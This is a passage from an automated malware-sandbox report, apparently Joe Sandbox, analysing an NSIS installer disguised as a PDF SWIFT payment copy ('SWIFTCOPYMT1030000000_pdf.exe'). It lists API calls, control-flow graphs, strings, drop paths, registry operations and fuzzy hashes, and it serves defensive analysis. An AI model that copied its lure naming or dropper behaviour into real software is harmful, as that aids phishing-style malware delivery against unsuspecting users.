                                      • lstrcmpiA.KERNEL32(?,.exe), ref: 00403725
                                      • GetFileAttributesA.KERNEL32(Call), ref: 00403730
                                      • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\udskriftskartotek\chiromancy\refalling), ref: 00403779
                                        • Part of subcall function 00405AD5: wsprintfA.USER32 ref: 00405AE2
                                      • RegisterClassA.USER32(007A1EA0), ref: 004037B6
                                      • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004037CE
                                      • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403803
                                      • ShowWindow.USER32(00000005,00000000), ref: 00403839
                                      • LoadLibraryA.KERNELBASE(RichEd20), ref: 0040384A
                                      • LoadLibraryA.KERNEL32(RichEd32), ref: 00403855
                                      • GetClassInfoA.USER32(00000000,RichEdit20A,007A1EA0), ref: 00403865
                                      • GetClassInfoA.USER32(00000000,RichEdit,007A1EA0), ref: 00403872
                                      • RegisterClassA.USER32(007A1EA0), ref: 0040387B
                                      • DialogBoxParamA.USER32(?,00000000,004039B4,00000000), ref: 0040389A
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                      • String ID: "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\udskriftskartotek\chiromancy\refalling$Call$Control Panel\Desktop\ResourceLocale$Epicurize Setup: Installing$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                      • API String ID: 914957316-237657829
                                      • Opcode ID: c7dc5bc517227d642f1141329839a7512a010cb895aab6e766c5c3cb5a21175c
                                      • Instruction ID: b0afc0e10dc8cbe2448bed9474bc03f366f348945261fe302a10aac9679cd79a
                                      • Opcode Fuzzy Hash: c7dc5bc517227d642f1141329839a7512a010cb895aab6e766c5c3cb5a21175c
                                      • Instruction Fuzzy Hash: FA61E6716442007EE710BB659C85F373AACEB8275AF00857EFA45B22E2D67D6D01CB2D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040173F Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      APIs
                                      • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\udskriftskartotek\chiromancy\refalling\avram\Peatery50\Busboy,00000000,00000000,00000031), ref: 0040177E
                                      • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\udskriftskartotek\chiromancy\refalling\avram\Peatery50\Busboy,00000000,00000000,00000031), ref: 004017A8
                                        • Part of subcall function 00405B77: lstrcpynA.KERNEL32(?,?,00000400,0040315F,007A1F00,NSIS Error), ref: 00405B84
                                        • Part of subcall function 00404E84: lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000,0078F2A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000,?), ref: 00404EBD
                                        • Part of subcall function 00404E84: lstrlenA.KERNEL32(00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000,0078F2A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000), ref: 00404ECD
                                        • Part of subcall function 00404E84: lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00402FA6,00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000,0078F2A8,007898A8), ref: 00404EE0
                                        • Part of subcall function 00404E84: SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll), ref: 00404EF2
                                        • Part of subcall function 00404E84: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                        • Part of subcall function 00404E84: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                        • Part of subcall function 00404E84: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                      • String ID: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp$C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll$C:\Users\user\udskriftskartotek\chiromancy\refalling\avram\Peatery50\Busboy$Call
                                      • API String ID: 1941528284-3433089771
                                      • Opcode ID: d3d96636bbead949d86675ec5ab461d68ce1a1ddc8a825193bae02ded4fdc182
                                      • Instruction ID: df8d039fdd937f1c478db27dfce12e75bce6feb5164cf919340bcacede668491
                                      • Opcode Fuzzy Hash: d3d96636bbead949d86675ec5ab461d68ce1a1ddc8a825193bae02ded4fdc182
                                      • Instruction Fuzzy Hash: F241B771900615BACB10BBA5CC46DAF7979DF42368F20423BF525F10E2DA3C5A419A6D
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00404E84 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 604 404e84-404e99 605 404f4f-404f53 604->605 606 404e9f-404eb1 604->606 607 404eb3-404eb7 call 405b99 606->607 608 404ebc-404ec8 lstrlenA 606->608 607->608 610 404ee5-404ee9 608->610 611 404eca-404eda lstrlenA 608->611 612 404ef8-404efc 610->612 613 404eeb-404ef2 SetWindowTextA 610->613 611->605 614 404edc-404ee0 lstrcatA 611->614 615 404f42-404f44 612->615 616 404efe-404f40 SendMessageA * 3 612->616 613->612 614->610 615->605 617 404f46-404f49 615->617 616->615 617->605
                                      APIs
                                      • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000,0078F2A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000,?), ref: 00404EBD
                                      • lstrlenA.KERNEL32(00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000,0078F2A8,007898A8,?,?,?,?,?,?,?,?,?,00402FA6,00000000), ref: 00404ECD
                                      • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00402FA6,00402FA6,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,00000000,0078F2A8,007898A8), ref: 00404EE0
                                      • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll), ref: 00404EF2
                                      • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404F18
                                      • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404F32
                                      • SendMessageA.USER32(?,00001013,?,00000000), ref: 00404F40
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                      • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp\System.dll
                                      • API String ID: 2531174081-3851766246
                                      • Opcode ID: 2a86b03a512ab473c329acdab3c148d37ff30063bb4f0d383429b9152d604446
                                      • Instruction ID: 0879e44440130bf100c4abc817e106b172b9c081b4a19821dc72f8a86b472426
                                      • Opcode Fuzzy Hash: 2a86b03a512ab473c329acdab3c148d37ff30063bb4f0d383429b9152d604446
                                      • Instruction Fuzzy Hash: E3216071900118BFDB019FA5CD849DEBFB9EB45354F14807AF904B6291C6785E40CBA4
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402E6C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 171fileCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 618 402e6c-402e82 619 402e84 618->619 620 402e8b-402e93 618->620 619->620 621 402e95 620->621 622 402e9c-402ea1 620->622 621->622 623 402eb1-402ebe call 403072 622->623 624 402ea3-402eac call 4030a4 622->624 628 403060 623->628 629 402ec4-402ec8 623->629 624->623 630 403062-403063 628->630 631 403001-403003 629->631 632 402ece-402ef1 GetTickCount 629->632 635 40306b-40306f 630->635 633 403005-403008 631->633 634 40304d-403050 631->634 636 402ef7 632->636 637 403068 632->637 633->637 638 40300a 633->638 640 403052 634->640 641 403055-40305e call 403072 634->641 639 402efc-402f04 636->639 637->635 643 40300f-403015 638->643 644 402f06 639->644 645 402f09-402f12 call 403072 639->645 640->641 641->628 650 403065 641->650 647 403017 643->647 648 40301a-403023 call 403072 643->648 644->645 645->628 654 402f18-402f21 645->654 647->648 648->628 655 403025-403038 WriteFile 648->655 650->637 656 402f27-402f47 call 405f82 654->656 657 40303a-40303d 655->657 658 402ffd-402fff 655->658 662 402ff9-402ffb 656->662 663 402f4d-402f64 GetTickCount 656->663 657->658 660 40303f-403049 657->660 658->630 660->643 664 40304b 660->664 662->630 665 402f66-402f6e 663->665 666 402fa9-402fad 663->666 664->637 667 402f70-402f74 665->667 668 402f76-402fa1 MulDiv wsprintfA call 404e84 665->668 669 402fee-402ff1 666->669 670 402faf-402fb2 666->670 667->666 667->668 675 402fa6 668->675 669->639 674 402ff7 669->674 672 402fd4-402fdf 670->672 673 402fb4-402fc8 WriteFile 670->673 677 402fe2-402fe6 672->677 673->658 676 402fca-402fcd 673->676 674->637 675->666 676->658 678 402fcf-402fd2 676->678 677->656 679 402fec 677->679 678->677 679->637
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00402ECE
                                      • GetTickCount.KERNEL32 ref: 00402F55
                                      • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F82
                                      • wsprintfA.USER32 ref: 00402F92
                                      • WriteFile.KERNELBASE(00000000,00000000,0078F2A8,7FFFFFFF,00000000), ref: 00402FC0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CountTick$FileWritewsprintf
                                      • String ID: ... %d%%
                                      • API String ID: 4209647438-2449383134
                                      • Opcode ID: f395eb1648f388a93fc8b21f20c206b8706aa4042387daabf36aa7791f524e93
                                      • Instruction ID: abbc5e543d40cc295139a54e2e8a13b251616715b744bb5f177e15d4b263a606
                                      • Opcode Fuzzy Hash: f395eb1648f388a93fc8b21f20c206b8706aa4042387daabf36aa7791f524e93
                                      • Instruction Fuzzy Hash: B1519C7190121AABCF10DF69DA48A9E7BB8BF04355F14413BF901B72C4D3789E50DBAA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040231A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 680 40231a-402360 call 402afc call 402a07 * 2 RegCreateKeyExA 687 402366-40236e 680->687 688 40289c-4028ab 680->688 689 402370-40237d call 402a07 lstrlenA 687->689 690 40237e-402381 687->690 689->690 693 402391-402394 690->693 694 402383-402390 call 4029ea 690->694 698 4023a5-4023b9 RegSetValueExA 693->698 699 402396-4023a0 call 402e6c 693->699 694->693 702 4023bb 698->702 703 4023be-402494 RegCloseKey 698->703 699->698 702->703 703->688 705 40266d-402674 703->705 705->688
                                      APIs
                                      • RegCreateKeyExA.KERNELBASE(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402358
                                      • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv10BA.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402378
                                      • RegSetValueExA.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsv10BA.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023B1
                                      • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsv10BA.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040248E
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CloseCreateValuelstrlen
                                      • String ID: C:\Users\user\AppData\Local\Temp\nsv10BA.tmp
                                      • API String ID: 1356686001-1065263791
                                      • Opcode ID: da0d7a498fd2405c09cfd266c61d295370a8e21e52f1f3187e4aec8230a6b6c5
                                      • Instruction ID: 496afd6724d83472fd7aeeeeb6c9636b40b67d15b6efd44fac0fbba193c6cb19
                                      • Opcode Fuzzy Hash: da0d7a498fd2405c09cfd266c61d295370a8e21e52f1f3187e4aec8230a6b6c5
                                      • Instruction Fuzzy Hash: 40116071E00208BEEB10EFB5CE89EAF7A78EB44358F10403AF905B61D1D6B85D419A69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 706 4015b3-4015c6 call 402a07 call 4056bd 711 4015c8-4015e3 call 40564f CreateDirectoryA 706->711 712 40160a-40160d 706->712 719 401600-401608 711->719 720 4015e5-4015f0 GetLastError 711->720 714 401638-40217f call 401423 712->714 715 40160f-40162a call 401423 call 405b77 SetCurrentDirectoryA 712->715 727 40289c-4028ab 714->727 728 40266d-402674 714->728 715->727 731 401630-401633 715->731 719->711 719->712 723 4015f2-4015fb GetFileAttributesA 720->723 724 4015fd 720->724 723->719 723->724 724->719 728->727 731->727
                                      APIs
                                        • Part of subcall function 004056BD: CharNextA.USER32(?,?,outvillain\faber.div,?,00405729,outvillain\faber.div,outvillain\faber.div,?,?,75EE3410,00405474,?,C:\Users\user\AppData\Local\Temp\,75EE3410,00000000), ref: 004056CB
                                        • Part of subcall function 004056BD: CharNextA.USER32(00000000), ref: 004056D0
                                        • Part of subcall function 004056BD: CharNextA.USER32(00000000), ref: 004056E4
                                      • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                      • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                      • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                      • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Users\user\udskriftskartotek\chiromancy\refalling\avram\Peatery50\Busboy,00000000,00000000,000000F0), ref: 00401622
                                      Strings
                                      • C:\Users\user\udskriftskartotek\chiromancy\refalling\avram\Peatery50\Busboy, xrefs: 00401617
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                      • String ID: C:\Users\user\udskriftskartotek\chiromancy\refalling\avram\Peatery50\Busboy
                                      • API String ID: 3751793516-4038554312
                                      • Opcode ID: 9db9fcc5c7d74c455dd159d915d30689da6efdc5fe5d50dbc9f8e17e04e80f96
                                      • Instruction ID: be2e729169105f21f0136a8afe605fb55404e4043758c9297c14daf22ca337c6
                                      • Opcode Fuzzy Hash: 9db9fcc5c7d74c455dd159d915d30689da6efdc5fe5d50dbc9f8e17e04e80f96
                                      • Instruction Fuzzy Hash: A7114831908150ABDB213F755D04EBF77B4EE56366724073FF492B22E2C63C09429A2E
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00405854 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 733 405854-40585e 734 40585f-40588a GetTickCount GetTempFileNameA 733->734 735 405899-40589b 734->735 736 40588c-40588e 734->736 738 405893-405896 735->738 736->734 737 405890 736->737 737->738
                                      APIs
                                      • GetTickCount.KERNEL32 ref: 00405868
                                      • GetTempFileNameA.KERNELBASE(?,?,00000000,?), ref: 00405882
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134274096358.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_6_2_400000_SWIFTCOPYMT1030000000_pdf.jbxd
                                      Similarity
                                      • API ID: CountFileNameTempTick
                                      • String ID: "C:\Users\user\Desktop\SWIFTCOPYMT1030000000_pdf.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                      • API String ID: 1716503409-2470672872
                                      • Opcode ID: 87e393fdd40e1d767205cfde8df7900e21dccd4be60ce2c97c6d908c1bde172d
                                      • Instruction ID: 7032c49e779d22ef4b019cebcd704e5cdda6a64cd28d021928a5f34cef86c798
                                      • Opcode Fuzzy Hash: 87e393fdd40e1d767205cfde8df7900e21dccd4be60ce2c97c6d908c1bde172d
                                      • Instruction Fuzzy Hash: 21F082777082046BDB109F66DC04B9B7B9CDF95750F14C03BFE44DA180D6B499548B59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00402A47 Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 739 402a47-402a70 RegOpenKeyExA 740 402a72-402a7d 739->740 741 402adb-402adf 739->741 742 402a98-402aa8 RegEnumKeyA 740->742 743 402aaa-402abc RegCloseKey call 405ea2 742->743 744 402a7f-402a82 742->744 752 402ae2-402ae8 743->752 753 402abe-402acd 743->753 745 402a84-402a96 call 402a47 744->745 746 402acf-402ad2 RegCloseKey 744->746 745->742 745->743 748 402ad8-402ada 746->748 748->741 752->748 754 402aea-402af8 RegDeleteKeyA 752->754 753->741 754->748 755 402afa 754->755 755->741
                                      APIs
                                      • RegOpenKeyExA.KERNELBASE(?,?,00000000,?,?), ref: 00402A68
                                      • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AA4
                                      • RegCloseKey.ADVAPI32(?), ref: 00402AAD
                                      • RegCloseKey.ADVAPI32(?), ref: 00402AD2
                                      • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402AF0
                                      Memory Dump Source
                                      • Source File: 00000006.00000002.134273513880.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000006.00000002.134273476871.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273555516.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                      • Associated: 00000006.00000002.134273591463.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
